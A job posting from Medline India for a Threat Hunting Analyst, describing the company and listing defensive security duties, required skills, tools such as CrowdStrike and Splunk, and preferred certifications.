Title: Threat Hunting Analyst
About Medline:
About Medline India:
Medline India was setup in 2010 in Pune, primarily as an offshore Development centre and to augment resources for Medline Industries LP headquartered in Chicago, USA. We are a 1500+ strong and growing team of technology, finance & and business support professionals who support our businesses worldwide towards a mission to make healthcare run better. We are an organization with a conducive work environment, ample opportunities to learn, contribute and grow with a highly empowered & engaged team. We encourage our people to share their best ideas and create new opportunities for our customers and ourselves to work together to solve today's toughest healthcare challenges.
About Medline Industries, LP:
Established in 1966, Medline Industries LP is a renowned global healthcare organization boasting 56 years of consecutive sales growth, exceeding $21 billion in annual sales. With a workforce of over 36,000 professionals spread across the globe, we operate in more than 125 countries and territories. As the largest privately held manufacturer and distributor of medical supplies in the United States, Medline is uniquely positioned to offer comprehensive products, education, and support across the continuum of care.
At present, Medline Industries, LP holds the esteemed position as the #1 market leader, delivering an extensive portfolio of over 550,000 medical products and clinical solutions. Our clientele includes hospitals, extended care facilities, surgery centres, physician offices, home care agencies, providers, and retailers.
We're proud to be recognized by Forbes as one of America's Best Large Employers and Best Employers for Women. Additionally, the Chicago Tribune has consistently named us a Top Workplace for the past 12 years.
Job Description:
Threat Hunting analyst performs a wide variety of security duties with a primary focus on threat actor-based tactics, techniques, and procedures. The ability to manage multiple simultaneous threat hunts spanning several platforms with various TTPs is a key function of this role. Knowledge sharing and mentoring of team members is a critical and necessary skill. Must have the ability to operate under pressure and influence the team dynamic when responding to incidents. Should be able to work to enhance and improve the team and processes over time in a well-established manner.
Roles and responsibilities:
- Perform hypothesis-based threat hunts using popular MITRE attack framework
- Perform intel-based threat hunting
- Conduct threat simulation exercises to test current security control
- Create diamond models to model threat activity
- Work directly with leadership to develop and improve existing internal processes
- Develop new processes that will add value to threat hunting team
- Provide proactive assistance to junior analysts to help them develop their skillset
- Develop advanced correlation rules for threat detection using CQL (CrowdStrike Query Language)
- Create and utilize threat intel report to conduct manual hunts across available data sources
- Perform static and dynamic analysis of malicious files
- Work proactively on critical security incidents
- Perform vulnerability review and risk assessment
- Core experience with Crowdstrike or SPLUNK
- L3 level experience into investigation, recommendation and take decisions related to Security Incident Investigation, Worked with Leadership
- Manage End-2-End Security Incident Investigation
- Experience in creating MITRE Attack Framework
- Knows basics of Vulnerability Analysis & Risk Assessment
- Manual Hunt
- Actively search for threats that may not have been detected by automated security tools.
- Detect hidden or undisclosed threats using advanced techniques and tools.
- Develops hypotheses about potential threats based on threat intelligence and industry trends.
- Performs an in-depth analysis of the network and system to uncover IOCs and APTs.
- Works closely with other cybersecurity teams to improve detection capabilities and share findings.
- Have a high level of knowledge in scripting (e.g. Python, PowerShell) to automate threat hunting tasks.
- Deeply analyze the tactics, techniques, and procedures (TTPs) of the attacker.
- Advanced Threat Detection
- Scripting and Programming Knowledge
- Advanced PowerShell, Bash, and Cmd Analysis
- Threat Intelligence, Malware Analysis, Vulnerability Analysis, Cloud Security, Data Analysis
Required skills:
- Ability to perform threat hunting using MITRE attack framework
- Ability to identify/detect/explain malicious activity that occurs within environments with high accuracy/confidence level
- Ability to develop advanced correlation rules for threat detection. Must be expertise in creating queries using SPL (Search processing language used by Splunk) or CQL (CrowdStrike Query language)
- Ability to create threat intelligence reports based on available threat intel
- Ability to perform static and dynamic analysis of possible malicious files
- Ability to perform Vulnerability analysis and risk assessment
- Should have strong log analytical skills
- Should be able to demonstrate good incident response skills in case of critical security incidents
- Moderate understanding of Windows and Linux operating systems, as well as command line tools
- Strong verbal as well as written communication skills
- Basic understanding of malware analysis
Year of Experience: 5+ years (Security Operations + Threat Hunting - [Minimum 2 years should be in threat hunting])
Tools - CrowdStrike, Splunk, Logscale Humio
Certification:
- GIAC / Offensive Security certifications preferred
- CTHP (CTHP (Certified Threat Hunting Professional): An advanced certification for threat hunters.) ,
- C|TIA (Certified Threat Intelligence Analyst),
- GIAC Certified Threat Intelligence (GCTI),
- Certified Threat Hunting Professional (CTHP).
One of this is a must have.
Programing language - Python (Good to have)
Qualification: Bachelor of Engineering in any stream
